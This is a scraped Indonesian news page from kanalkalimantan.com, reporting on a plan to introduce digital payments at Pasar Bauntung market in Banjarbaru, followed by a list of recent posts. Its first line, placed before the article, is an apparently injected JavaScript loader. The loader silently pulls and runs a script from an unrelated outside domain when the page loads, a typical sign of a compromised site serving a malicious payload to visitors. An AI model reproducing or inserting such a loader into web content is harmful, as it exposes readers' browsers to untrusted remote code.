(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Pasar Bauntung Banjarbaru Disiapkan Bertransaksi Secara Digital


KANALKALIMANTAN.COM, BANJARBARU – Transaksi jual beli di Pasar Bauntung Banjarbaru akan diarahkan ke pembayaran secara digital.

Upaya digitalisasi pembayaran di Pasar Bauntung Banjarbaru dibahas Bank Indonesia (BI) Perwakilan Provinsi Kalimantan Selatan bersama Pemko Banjarbaru di ruang tamu utama Wali Kota Banjarbaru, Selasa (21/6/2021) siang.

Baca juga: Rekonstruksi Pembunuhan di Terminal Gambut, Pelaku dan Korban Sempat Bercumbu di TKP

Rapat koordinasi rencana Pasar Bauntung Banjarbaru akan menerapkan digitalisasi pembayaran, dihadiri Wakil Wali Kota Banjarbaru Wartono, Sekda Banjarbaru, Dirut Utama Bank Kalsel Divisi Dana Jasa dan Divisi Teknologi Sistem Informasi, Bank Kalsel Cabang Banjarbaru, pimpinan LinkAja area Kalsel, Asisten II, Kepala BPKAD, dan Kepala UPTD Pasar Bauntung Banjarbaru.

 

Mengenai rencana teknologi digitalisasi itu, diharapkan penjual dan pembeli di Pasar Bauntung Banjarbaru dapat mengubah pembayaran menjadi tidak lagi sistem tunai atau uang fisik.

Wakil Wali Kota Banjarbaru menyampaikan terkait program teknologi digitalisasi, perlu dilakukan edukasi terlebih dahulu kepada masyarakat, bagaimana cara penggunannya.

“Edukasi ini memang tidak secepat membalik telapak tangan, perlu kesabaran untuk mengajarkannya, karena karakter dari masyarakat kita yang harus pelan-pelan untuk diberitahu,” ujar Wartono.

Perlu pemahaman khusus, karena masyarakat umum sebagian masih ada yang tidak menggunakan hand phone, dalam hal ini Wakil Wali Kota menghimbau agar masyarakat diajak secara pelan-pelan.

“Kami tidak meminta 100 persen masyarakat dapat menggunakan teknologi digital, minimal ada berapa persen terlebih dahulu, dan kami berharap pada pembukaan sudah 50 persen untuk pembukaan rekening dan lainnya,” jelasnya.

Baca juga: Bawa Surat Antigen Palsu, Seorang Pelajar Diamankan di Bandara Syamsudin Noor

Program digitalisasi pembayaran tertuju terlebih dahulu mengedukasi penjual yang ada di Pasar Bauntung Banjarbaru, selanjutnya pelan-pelan untuk mengedukasi pembeli masyarakat umum. (kanalkalimantan.com/dewi)

Reporter : dewi
Editor : kk


Risa

Recent Posts

Amuntai Expo dan Bazar Ekonomi Kreatif 2024

KANALKALIMANTAN.COM, AMUNTAI - Memeriahkan Hari Jadi ke-72 Kabupaten Hulu Sungai Utara (HSU) digelar Amuntai Expo… Read More

40 menit ago

Warga Muhammadiyah Banjarbaru Berhalalbihalal di Masjid At Taqwa

KANALKALIMANTAN.COM, BANJARBARU - Pimpinan Cabang Muhammadiyah Banjarbaru Utara menggelar halalbihalal sekaligus Hari Bermuhammadiyah kali pertama… Read More

3 jam ago

5 Mei Hari Bidan Sedunia

KANALKALIMANTAN.COM – Negara-negara di dunia merayakan Hari Bidan Sedunia yang jatuh pada 5 Mei setiap… Read More

9 jam ago

Syamsudin Noor Jadi Bandara Domestik, Begini Respon Wali Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pencopotan status internasional pada Bandara Syamsudin Noor Banjarmasin yang terletak di Kota… Read More

9 jam ago

Presiden Jokowi di Booth PLN PEVS 2024, Dirut PLN Paparkan Kesiapan Ekosistem Kendaraan Listrik

KANALKALIMANTAN.COM, JAKARTA - Presiden Republik Indonesia Joko Widodo (Jokowi) mengunjungi booth PT PLN (Persero) dalam… Read More

12 jam ago

Akhir Pekan Pasti Hemat, Berikut Promo BRI hingga 30 Persen di 8 Kota Indonesia

KANALKALIMANTAN.COM – Bagi sebagian orang, akhir pekan (weekend) merupakan waktu yang dinanti. Sembari rehat bekerja,… Read More

16 jam ago

This website uses cookies.